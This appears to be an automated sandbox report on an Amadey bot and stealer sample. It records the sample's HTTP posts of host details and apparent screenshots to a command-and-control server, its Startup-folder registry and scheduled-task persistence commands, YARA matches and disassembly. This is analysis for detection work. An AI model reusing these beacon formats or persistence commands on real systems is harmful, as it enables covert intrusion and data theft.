                                                                                Nov 29, 2024 01:53:24.709549904 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 65 64 61 61 34 38 66 39 65 61 37 65 32 30 66 32 39 65 61 64 38 66 63 62 65 35 66 62 31 66 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------edaa48f9ea7e20f29ead8fcbe5fb1f54Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:24.709598064 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:24.709614038 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:24.829660892 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:24.829720020 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:53:24.829865932 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:24.829940081 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:24.830009937 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:24.830048084 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:24.830106020 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                112192.168.2.44991472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:25.858565092 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                113192.168.2.44991572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:26.175827026 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 97961
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:26.175852060 CET99OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 31 35 32 31 32 32 34 36 31 32 32 36 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:26.175906897 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:26.176047087 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:26.296040058 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:26.296154976 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:26.296190023 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:26.296233892 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:26.296282053 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:26.296298981 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:26.296427011 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                114192.168.2.44992172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:27.344398975 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:19:51:53
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\Desktop\S7AGd447vH.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\S7AGd447vH.exe"
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:19:51:58
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe"
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 66%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
                                                                                Imagebase:0x240000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
                                                                                Imagebase:0xd20000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
                                                                                Imagebase:0x9c0000
                                                                                File size:59'392 bytes
                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:19:52:04
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:19:53:01
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:1.3%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:53
                                                                                  execution_graph 20631 401045 20634 4109b6 20631->20634 20637 410989 20634->20637 20638 410998 20637->20638 20639 41099f 20637->20639 20643 416170 20638->20643 20646 4161dc 20639->20646 20642 40104a 20644 4161dc 28 API calls 20643->20644 20645 416182 20644->20645 20645->20642 20649 415f12 20646->20649 20650 415f1e ___scrt_is_nonwritable_in_current_image 20649->20650 20657 416943 EnterCriticalSection 20650->20657 20652 415f2c 20658 415f6d 20652->20658 20654 415f39 20668 415f61 20654->20668 20657->20652 20660 415f89 20658->20660 20662 416000 _free 20658->20662 20659 415fe0 20659->20662 20663 41ccfb 28 API calls 20659->20663 20660->20659 20660->20662 20671 41ccfb 20660->20671 20662->20654 20665 415ff6 20663->20665 20664 415fd6 20666 417051 _free 14 API calls 20664->20666 20667 417051 _free 14 API calls 20665->20667 20666->20659 20667->20662 20699 41698b LeaveCriticalSection 20668->20699 20670 415f4a 20670->20642 20672 41cd23 20671->20672 20673 41cd08 20671->20673 20675 41cd32 20672->20675 20680 421e3c 20672->20680 20673->20672 20674 41cd14 20673->20674 20676 413c57 _free 14 API calls 20674->20676 20687 421e6f 20675->20687 20679 41cd19 ___scrt_fastfail 20676->20679 20679->20664 20681 421e47 20680->20681 20682 421e5c HeapSize 20680->20682 20683 413c57 _free 14 API calls 20681->20683 20682->20675 20684 421e4c 20683->20684 20685 41569f __cftof 25 API calls 20684->20685 20686 421e57 20685->20686 20686->20675 20688 421e87 20687->20688 20689 421e7c 20687->20689 20691 421e8f 20688->20691 20697 421e98 _free 20688->20697 20690 41753a __fread_nolock 15 API calls 20689->20690 20695 421e84 20690->20695 20692 417051 _free 14 API calls 20691->20692 20692->20695 20693 421ec2 HeapReAlloc 20693->20695 20693->20697 20694 421e9d 20696 413c57 _free 14 API calls 20694->20696 20695->20679 20696->20695 20697->20693 20697->20694 20698 41571a _free 2 API calls 20697->20698 20698->20697 20699->20670 19461 41b64a 19462 41b657 19461->19462 19466 41b66f 19461->19466 19463 413c57 _free 14 API calls 19462->19463 19464 41b65c 19463->19464 19465 41569f __cftof 25 API calls 19464->19465 19475 41b667 19465->19475 19467 41b6ce 19466->19467 19466->19475 19511 41fa33 19466->19511 19469 417240 __fread_nolock 25 API calls 19467->19469 19470 41b6e6 19469->19470 19481 41b186 19470->19481 19473 417240 __fread_nolock 25 API calls 19474 41b71a 19473->19474 